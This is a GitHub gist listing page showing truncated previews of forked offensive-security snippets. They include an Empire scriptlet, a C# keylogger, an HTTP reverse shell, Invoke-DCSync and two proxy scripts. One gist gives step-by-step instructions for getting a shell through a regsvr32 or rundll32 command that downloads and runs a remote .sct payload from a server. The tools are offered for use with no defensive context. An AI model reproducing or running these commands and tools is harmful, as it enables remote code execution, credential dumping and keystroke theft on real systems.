eniac888
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{20001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll --> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Create Empire Listener | |
| 2. Generate Stager | |
| 3. Host Stager Code At Some URL | |
| 4. Host .sct File At Some URL | |
| 5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll | |
| 6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() ) | |
| -Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec(); | |
| 7. Wait for Shell... |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Author: Casey Smith @subTee | |
| License: BSD3-Clause | |
| .SYNOPSIS | |
| Simple Reverse Shell over HTTP. Execute Commands on Client. | |
eniac888
/ udpProxyServer.cpp
Created
November 18, 2015 16:09
— forked from mike-zhang/udpProxyServer.cpp
a simple udp proxy server (cpp code)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| File : udpProxyServer.cpp | |
| Author : Mike | |
| E-Mail : [email protected] | |
| */ | |
| #include <cstdlib> | |
| #include <cstddef> | |
| #include <iostream> | |
| #include <string> | |
| #include <boost/shared_ptr.hpp> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; |
eniac888
/ Invoke-DCSync.ps1
Created
October 3, 2015 11:15
— forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-NetUser { | |
| <# | |
| .SYNOPSIS | |
| Query information for a given user or users in the domain. | |
| .DESCRIPTION | |
| This function users [ADSI] and LDAP to query the current | |
| domain for all users. Another domain can be specified to | |
| query for users across a trust. | |
| This is a replacement for "net users /domain" |
eniac888
/ proxy_s5.py
Last active
September 21, 2015 03:04
— forked from yaonie/proxy_s5.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Filename s5.py | |
| # Python Dynamic Socks5 Proxy | |
| # Usage: python s5.py 1080 | |
| # Background Run: nohup python s5.py 1080 & | |
| # Email: [email protected] | |
| import socket, sys, select, SocketServer, struct, time | |
| class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass |